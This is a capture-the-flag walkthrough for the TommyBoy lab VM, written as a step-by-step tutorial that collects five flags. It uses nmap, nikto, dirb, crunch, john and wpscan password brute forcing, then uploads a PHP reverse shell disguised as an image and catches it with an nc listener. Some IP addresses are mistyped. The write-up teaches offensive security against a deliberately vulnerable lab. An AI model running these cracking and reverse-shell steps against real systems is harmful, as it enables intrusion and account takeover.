Introduction
Hi, There In this post you will learn how to CTF the TommyBoy challenge there are 5 flags and we are going to capture each flag.
To download Tommy boy [Click here]
Have any doubt use the discord server.
Discord: https://discord.gg/rmW5eWsjhR
Twitter: https://twitter.com/HacklikeHacker
Aim
To CTF the 5 hidden flags.
Tommyboy Hacking Phases
- Finding IP
- Nmap scan
- Nikto Scan
- 1st Flag Capture
- View page source
- prehistoricforest
- Exif tool
- 2nd Flag capture
- Entering spanky password to blog post
- Nmap check open ports
- Access the target using FTP
- 3rd Flag capture
- Capturing 4th Flag
- Cracking zip file using john
- Unzip file
- Wpscan to enumerate wordpress
- Login to WordPress
- SSH connecting
- Restoring website
- Capture the last flag
Finding IP
To find the target IP just enter arp-scan -l
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-ip-1024x314.webp)
Nmap scan
Just running a -A scan
nmap -A 192.168.1.108
Found the port 80,22 and 8008 are open, Let’s note this down.
![](http://techyrick.com/wp-content/uploads/2022/02/tomy-boy-nmap-1-1024x589.webp)
Nikto Scan
Running a Nikto scan to find any possible vulnerability.
nikto -h http://192.168.1.2
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-nikto.webp)
1st Flag Capture
The 1st flag was inside the /robots.txt file, From Nikto I have found that /robots.txt is open.
curl http://192.168.1.2/robots.txt
![](http://techyrick.com/wp-content/uploads/2022/02/flag-1-1024x347.webp)
First flag: B34rcl4ws
View page source
To view the page source I am just entering curl http://192.1681.2
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-yt-1024x306.webp)
We can find a YT link and let’s go to the link.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-17_48_22-Tommy-Boy-_Hey-Prehistoric-Forest_-YouTube-Brave-1024x775.webp)
prehistoricforest
After viewing the Video I have found that it is a url.
http://192.1681.1.2/prehistoricforest
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-boy-wp-1024x508.webp)
After clicking on the first post I have found there is another URL called /richard. Let’s use /richard instead of prehistoricforest.
![](http://techyrick.com/wp-content/uploads/2022/02/richard-1024x183.webp)
http://192.168.1.2/richard
![](http://techyrick.com/wp-content/uploads/2022/02/richard-1.webp)
Click on the chockedrichard.jpg and download the file to desktop.
![](http://techyrick.com/wp-content/uploads/2022/02/shockedrichard-1024x659.webp)
Exif tool
Using the Exif tool to find the hash hiding inside the jpg file.
exiftool shockedrichard.jpg
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-crack.webp)
We can see the hash in the place of user comment and I decryptd the hash and it’s password is spanky
Hash: ce154b5a8e59c89732bc25d6a2e6b90b
Password: spanky
2nd Flag capture
I have found the second flag which is hinding inside the below url.
![](http://techyrick.com/wp-content/uploads/2022/02/2nd-flag-e.webp)
http://192.1681.1.2/thisisthesecondflagyayyou.txt
![](http://techyrick.com/wp-content/uploads/2022/02/2nd-captured.webp)
Second Flag: Z4l1nsky
Entering spanky password to blog post
You noticed one of the post is password protected to unlock it enter the decrypted password that is spanky
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-18_19_31-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
Once you entered the password the post will be readable and take a look at the blog post there are many hidden things.
1. There is something about nickburns
2. There is an FTP service running and hosted on a Non-standard port. Also, the FTP server goes up and down with a regular frequency of 15 mins
![](http://techyrick.com/wp-content/uploads/2022/02/3r-flag-password.webp)
Nmap check open ports
nmap -p- -sV 192.168.1.2 –open
Can find that the port 65534 is open let’s access the port using FTP
![](http://techyrick.com/wp-content/uploads/2022/02/tommy-ddddd-1024x354.webp)
Access the target using FTP
ftp 192.168.1.2 65534
cat readme.txt
![](http://techyrick.com/wp-content/uploads/2022/02/66.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/readme-1024x509.webp)
3rd Flag capture
Now we know there is another URL called
http://192.168.1.2:8008/NickIzL33t
Let’s go there and let’s use port 8008 to access it.
![](http://techyrick.com/wp-content/uploads/2022/02/dummy-test-1.webp)
Now, run the dirb command
dirb http://192.168.1.2:8008/NickIzL33t/ /usr/share/wordlists/rockyou.txt -a "Mozilla/5.0 (iPhone; CPU iPhone OS 6_0 like Mac OS X) AppleWebKit/536.26 (KHTML, like Gecko) Version/6.0 Mobile/10A5376e Safari/8536.25" -X .html
We are running the dirb command to get the fallon1.html file.
http://192.168.1.108:8008/NickIzL33t/fallon1.html
Go to the above link and we will be seeing this ????????
![](http://techyrick.com/wp-content/uploads/2022/02/fallon1.txt.webp)
Click on the third flag.
![](http://techyrick.com/wp-content/uploads/2022/02/3rd-flag-done.webp)
3rd Flag: TinyHead
Additionally, download the zip file and explore the hint file.
Capturing 4th Flag
Downloading zip file.
![](http://techyrick.com/wp-content/uploads/2022/02/password-3rd-flag.webp)
There is a hint given to crack the zip file.
http://192.168.1.108:8008/NickIzL33t/hint.txt
![](http://techyrick.com/wp-content/uploads/2022/02/hint.txt.webp)
To crack the zip file password let’s generate a password using crunch.
crunch 13 13 -t bev,%%@@^1995 -o /root/Desktop/dict.txt
![](http://techyrick.com/wp-content/uploads/2022/02/crunch-pass.webp)
Cracking zip file using john
Cracked the password.
Password = bevH00tr$1995
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_06_49-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x154.webp)
Unzip file
unzip t0msp4ssw0rdz.zip
cat passwords.txt
![](http://techyrick.com/wp-content/uploads/2022/02/pass-h-1-1024x537.webp)
Username: bigtommysenior
Password: fatguyinalittlecoat <partial password>
Wpscan to enumerate wordpress
wpscan -u http://192.168.1.2/prehistoricforest/ --wordlist=/usr/share/wordlists/rockyou.txt --username tom
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_16_50-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl.webp)
User: tom
Password: tomtom1
Login to WordPress
http://192.168.1.2/prehistoricforest/wp-admin
User: tom
Password: tomtom1
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_19_06-Callahan-Employee-Blog-‹-Log-In-Brave.webp)
Once logged in you can see there is one post.
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_19_43-Edit-Post-‹-Callahan-Employee-Blog-—-WordPress-Brave-1024x636.webp)
Username: bigtommysenior Password: fatguyinalittlecoat1938!!
SSH connecting
ssh bigtommysenior@192.168.1.2
Username: bigtommysenior Password: fatguyinalittlecoat1938!!
![](http://techyrick.com/wp-content/uploads/2022/02/ssh-access-1024x178.webp)
ls -la
cat el-flag-numero-quatro.txt
![](http://techyrick.com/wp-content/uploads/2022/02/cracked-1024x428.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_23_26-Kali-Linux-2021.3-64bit-VMware-Workstation-16-Player-Non-commercial-use-onl-1024x598.webp)
4th Flag: EditButton
Restoring website
To capture the 5th flag we need to restore the site to normal level.
cp callahanbak.bak /var/www/html/index.html
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-16_24_50-Welcome-to-Callahan-Auto-Brave-1024x398.webp)
Capture the last flag
http://192.168.1.2:8008/NickIzL33t/P4TCH_4D4MS/
Going to the above link and uploading this payload usr/share/webshells/php
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_05_35-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_06_27-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
http://192.168.1.2:8008/NickIzL33t/P4TCH_4D4MS/upload.php
Coming back to the terminal
cd /var/thatsg0nnaleaveamark/NickIzL33t/P4TCH_4D4MS/ ls cd uploads/ ls mv php-reverse-shell.png php-reverse-shell.php nc –lvp 1234
Now click on the below link to open the shell
http://192.168.1.108:8008/NickIzL33t/P4TCH_4D4MS/uploads/php-reverse-shell.php
ls -la cat .5.txt
![](http://techyrick.com/wp-content/uploads/2022/02/2022-02-22-21_10_15-Hack-the-TommyBoy-VM-CTF-Challenge-Hacking-Articles-Brave.webp)
5th Flag – Buttcrack